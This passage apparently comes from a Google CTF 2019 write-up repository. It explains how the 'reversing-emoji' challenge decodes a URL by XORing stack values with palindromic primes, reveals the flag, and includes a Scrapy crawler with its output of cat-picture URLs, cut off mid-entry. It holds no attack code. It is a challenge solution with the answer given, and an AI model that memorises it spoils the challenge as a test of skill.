242 ^ 151
216 ^ 181
208 ^ 191
339 ^ 313
264 ^ 353
344 ^ 373
267 ^ 383
743 ^ 727
660 ^ 757
893 ^ 787
892 ^ 797
1007 ^ 919
975 ^ 929
```

The numbers on the left of the XOR match the values pushed onto the stack. All 3 blocks are similar, so we can assume that they are all doing the same thing with different numbers. We can also guess that the numbers on the right have to be calculated, and that the time it takes to calculate them increases as the program goes on. We can also see that the numbers on the right are primes, which supports our theory that maybe we need to make the calculations more efficient. They seem to be specific primes, however, not just any prime number. There is an [online database for number sequences](https://oeis.org/), so we can just enter those numbers in there and see that they are [palindromic prime numbers](https://oeis.org/A002385). It even gives us a small list and algorithms to find them. Another observation is that the palindromes are in order, so now we can just calculate them and XOR each one with the values. `extract-palindromes.py` outputs a list of palindromes in the `palindromes` file. Filtering the first 6 million primes is enough to get all the palindromes needed. `palindromes.py` reads the list of palindromes and XORs them with the correct values.
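
The decoding described above, as an added example that is not the repository's `extract-palindromes.py` or `palindromes.py`: instead of filtering a list of primes, it builds decimal palindromes in increasing order, keeps the prime ones, and XORs them with the 20 stack values from the trace. The function names and the `skip` parameter (how many palindromic primes to pass over before the first key) are assumptions of this example.

```python
from itertools import count, islice

# Left-hand operands from the xor trace in the write-up (the values the emoji
# program pushes onto the stack), in the order they are printed.
STACK_VALUES = [106, 119, 113, 119, 49, 74, 172, 242, 216, 208,
                339, 264, 344, 267, 743, 660, 893, 892, 1007, 975]


def is_prime(n):
    """Trial division; sufficient for the small keys used here."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    d = 3
    while d * d <= n:
        if n % d == 0:
            return False
        d += 2
    return True


def palindromes():
    """Yield decimal palindromes 1..9, 11, 22, ..., 101, 111, ... in order."""
    for length in count(1):
        half = (length + 1) // 2
        for left in range(10 ** (half - 1), 10 ** half):
            s = str(left)
            # Odd lengths share the middle digit: mirror all but the last one.
            mirror = s[-2::-1] if length % 2 else s[::-1]
            yield int(s + mirror)


def palindromic_primes():
    """Palindromic primes in increasing order (OEIS A002385)."""
    return (p for p in palindromes() if is_prime(p))


def xor_with_keys(values, skip=0):
    """XOR each value with consecutive palindromic primes, after `skip` of them."""
    keys = islice(palindromic_primes(), skip, skip + len(values))
    return [v ^ k for v, k in zip(values, keys)]


def decode(values, skip=0):
    return "".join(chr(c) for c in xor_with_keys(values, skip))


def encode(text, skip=0):
    # XOR is its own inverse, so encoding reuses the same key stream.
    return xor_with_keys([ord(c) for c in text], skip)


if __name__ == "__main__":
    print(decode(STACK_VALUES))
```

Because the key stream depends only on the position in the sequence, a block decoded with the wrong `skip` yields garbage, which makes a known plaintext a quick check on the chosen offset.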

The first chunk prints out `http://emoji-t0anaxnr3nacpt4na.web.ctfco`, and we can already see that the URL is longer than the one we had earlier. We already know the rest of the URL, which is `mpetition.com/`, and that matches the number of values in the next chunk. Using this, we can reverse it and double check that we are doing it correctly. If we try doing the same thing with the second chunk, it does not produce the same output. This is where the `🚛 🥈 9️⃣ 9️⃣ ✋` comes in. That value gives us the starting index - 1. Finally, the full URL is `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/humans_and_cauliflowers_network/` and we can get the flag `CTF{Peace_from_Cauli!}`.

--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/vm.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/vm.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/items.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html

import scrapy


class ImageItem(scrapy.Item):
    # define the fields for your item here like:
    # name = scrapy.Field()
    # Field is only reachable through the scrapy module imported above
    image_urls = scrapy.Field()
    images = scrapy.Field()

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/middlewares.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html

from scrapy import signals


class CtfCrawlSpiderMiddleware(object):
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the spider middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_spider_input(self, response, spider):
        # Called for each response that goes through the spider
        # middleware and into the spider.

        # Should return None or raise an exception.
        return None

    def process_spider_output(self, response, result, spider):
        # Called with the results returned from the Spider, after
        # it has processed the response.

        # Must return an iterable of Request, dict or Item objects.
        for i in result:
            yield i

    def process_spider_exception(self, response, exception, spider):
        # Called when a spider or process_spider_input() method
        # (from other spider middleware) raises an exception.

        # Should return either None or an iterable of Response, dict
        # or Item objects.
        pass

    def process_start_requests(self, start_requests, spider):
        # Called with the start requests of the spider, and works
        # similarly to the process_spider_output() method, except
        # that it doesn’t have a response associated.

        # Must return only requests (not items).
        for r in start_requests:
            yield r

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)


class CtfCrawlDownloaderMiddleware(object):
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the downloader middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_request(self, request, spider):
        # Called for each request that goes through the downloader
        # middleware.

        # Must either:
        # - return None: continue processing this request
        # - or return a Response object
        # - or return a Request object
        # - or raise IgnoreRequest: process_exception() methods of
        #   installed downloader middleware will be called
        return None

    def process_response(self, request, response, spider):
        # Called with the response returned from the downloader.

        # Must either;
        # - return a Response object
        # - return a Request object
        # - or raise IgnoreRequest
        return response

    def process_exception(self, request, exception, spider):
        # Called when a download handler or a process_request()
        # (from other downloader middleware) raises an exception.

        # Must either:
        # - return None: continue processing this exception
        # - return a Response object: stops process_exception() chain
        # - return a Request object: stops process_exception() chain
        pass

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/pipelines.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html

class CtfCrawlPipeline(object):
    def process_item(self, item, spider):
        return item

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/settings.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Scrapy settings for ctf_crawl project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     https://doc.scrapy.org/en/latest/topics/settings.html
#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html

BOT_NAME = 'ctf_crawl'

SPIDER_MODULES = ['ctf_crawl.spiders']
NEWSPIDER_MODULE = 'ctf_crawl.spiders'


# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'ctf_crawl (+http://www.yourdomain.com)'

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
#COOKIES_ENABLED = False

# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False

# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}

# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'ctf_crawl.middlewares.CtfCrawlSpiderMiddleware': 543,
#}

# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
#    'ctf_crawl.middlewares.CtfCrawlDownloaderMiddleware': 543,
#}

# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}

# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1}
IMAGES_STORE = 'images'

# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__init__.py:
--------------------------------------------------------------------------------
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/cat_images.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import scrapy
import scrapy.item


class CatImagesSpider(scrapy.Spider):
    name = 'cat_images'
    allowed_domains = ['emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']
    start_urls = ['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']

    def parse(self, response):
        for img in response.xpath('//img[@src]/@src').getall():
            yield ImageItem(image_urls=['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/' + img])
        yield {'url': response.url}

        for next_page in response.xpath('//ul/li/a[@href]/@href').getall():
            yield response.follow(next_page, self.parse)

class ImageItem(scrapy.Item):
    image_urls=scrapy.Field()
    images=scrapy.Field()
    pass

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/images.zip:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/images.zip -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/output.json: -------------------------------------------------------------------------------- 1 | [ 2 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "images": []}, 3 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]}, 4 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "images": []}, 5 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "images": []}, 6 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "images": []}, 7 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "images": []}, 8 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "images": []}, 9 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png", "path": "full/92c5bebb4a1a5a2abe763662410522e020370036.jpg", "checksum": "915360b466171ae973a31f36a8dccf2b"}]}, 10 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png", "path": "full/9a98f8e6371a0c0bee4db8fbdc16e1de6e20b358.jpg", "checksum": 
"030ab1ea9f6a2575d3b761c9e6f94cf4"}]}, 11 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "images": []}, 12 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "images": []}, 13 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "images": []}, 14 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png", "path": "full/3f98ab360a2a663c47ea4e6c264e286801f0e321.jpg", "checksum": "a45acf55d7eafba433e029a4f77156ff"}]}, 15 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png", "path": "full/c9d6bd3443944576a8f1c9db3e023a9c3fd0f093.jpg", "checksum": "daf4d5b53e8150cc34c4f929dafe6176"}]}, 16 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png", "path": "full/4654a4edf8b48b6f0b25344d4732cdb363f9fd86.jpg", "checksum": "7bedf20344ed7396ada03e05568d342a"}]}, 17 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "images": []}, 18 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "images": []}, 19 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "images": []}, 20 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "images": []}, 21 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "images": []}, 22 | {"url": 
"http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "images": []}, 23 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "images": []}, 24 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "images": []}, 25 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "images": []}, 26 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "images": []}, 27 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "images": []}, 28 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "images": []}, 29 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "images": []}, 30 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "images": []}, 31 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png", "path": "full/22d41b0a6ed5e6eb26978dc9947348984fa2751a.jpg", "checksum": "b747ee5de7b71378689ddf28b4e0324d"}]}, 32 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png", "path": "full/92570bbf9f191675caa67287efbbc6cc305359f4.jpg", "checksum": "fe800727805b94d62b6890c20d700eda"}]}, 33 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png", "path": "full/fffac339f992de646f4afda9e397f8a944cc892a.jpg", "checksum": 
"12cc841fd891e084d098d2c1dff20e40"}]}, 34 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "images": []}, 35 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png", "path": "full/039a702f65c376fae9a12c05bdd8a8b3b59c7dda.jpg", "checksum": "afbe89777fc107502443bcd18a24b125"}]}, 36 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "images": []}, 37 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png", "path": "full/83f48d80345289ed99ab4223a06c1e82f1040753.jpg", "checksum": "be4d0c75228e1320eedceb53952da777"}]}, 38 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "images": []}, 39 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png", "path": "full/97e1e344d7c6fef1407268f46e111739a4f6b209.jpg", "checksum": "5b27adc11e6e7e4aadd002ea43bf9ed8"}]}, 40 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png", "path": "full/38a562208b2c75253faf0ce904e3315941229e27.jpg", "checksum": "a959798a56e336faf024f7f5cf3e7278"}]}, 41 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png", "path": "full/9629f6e5f45c96f6baeffd4537492dc292967e51.jpg", "checksum": "9329bfc1986df8b54d0a764c9ac9aee3"}]}, 42 | {"url": 
"http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "images": []}, 43 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png", "path": "full/85314f7ad344aa310a68e2a4dba35b5351241394.jpg", "checksum": "0ac23f09bd44defda99c2866811b9f98"}]}, 44 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "images": []}, 45 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png", "path": "full/9eda20a2e263c2f8b86403961f8dd4d7bb690f63.jpg", "checksum": "9da6095016ea0f36f45dbe7eaad983ab"}]}, 46 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "images": []}, 47 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "images": []}, 48 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "images": []}, 49 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png", "path": "full/7c2112573a36c6ecd0fcaee7910262d9261ad3a7.jpg", "checksum": "3a3620d255565ad02a85d7f977333313"}]}, 50 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "images": []}, 51 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png", "path": "full/c4218cd04fd778cb294126da9e8080d2698b48c2.jpg", "checksum": "7d69d714d7e8bb496fb5fd8c715b16f7"}]}, 52 | {"url": 
"http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "images": []}, 53 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png", "path": "full/65956be3df8d2cf2dd92b68bc27ca00d971c90cf.jpg", "checksum": "8fefb94e886b31a4d18713734a380926"}]}, 54 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png", "path": "full/a16ef5e5ac564d8575751c92d1a79bec626b1291.jpg", "checksum": "f380f9a007b1c95dd5c4d396d14811ad"}]}, 55 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png", "path": "full/3399391f56c8cf33639811e23ec1b0680331f828.jpg", "checksum": "129c07390481e91e982f40ce09014878"}]}, 56 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png", "path": "full/718d65f9d78edbb731d393133d9ad1e7c17f3918.jpg", "checksum": "07ea3c9a50faeb2226e34ac9359a703c"}]}, 57 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png", "path": "full/0e1eb22bdc579904b1fcb1e47779dbe0101c47f6.jpg", "checksum": "e0c267f5042a480d4e8b5a66d567bcfd"}]}, 58 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "images": []}, 59 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "images": []}, 60 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png"], "images": [{"url": 
"http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png", "path": "full/ea44bc35b1c061514df02383d43144e0ad8cfd99.jpg", "checksum": "b716a56675f009d8d96775357f11eb15"}]}, 61 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png", "path": "full/ec4c33f2a3b93616e7ced72ce9dcc43a9db8da10.jpg", "checksum": "625f4ded6d3f3babd4603a534bce77ca"}]}, 62 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png", "path": "full/467eb907739397a78c295c7ec9c73fdbbd1a5b11.jpg", "checksum": "a8bfb781aaf0efe9819895e036a4e548"}]}, 63 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "images": []}, 64 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "images": []}, 65 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "images": []}, 66 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "images": []}, 67 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "images": []}, 68 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "images": []}, 69 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "images": []}, 70 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "images": []}, 71 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png", "path": 
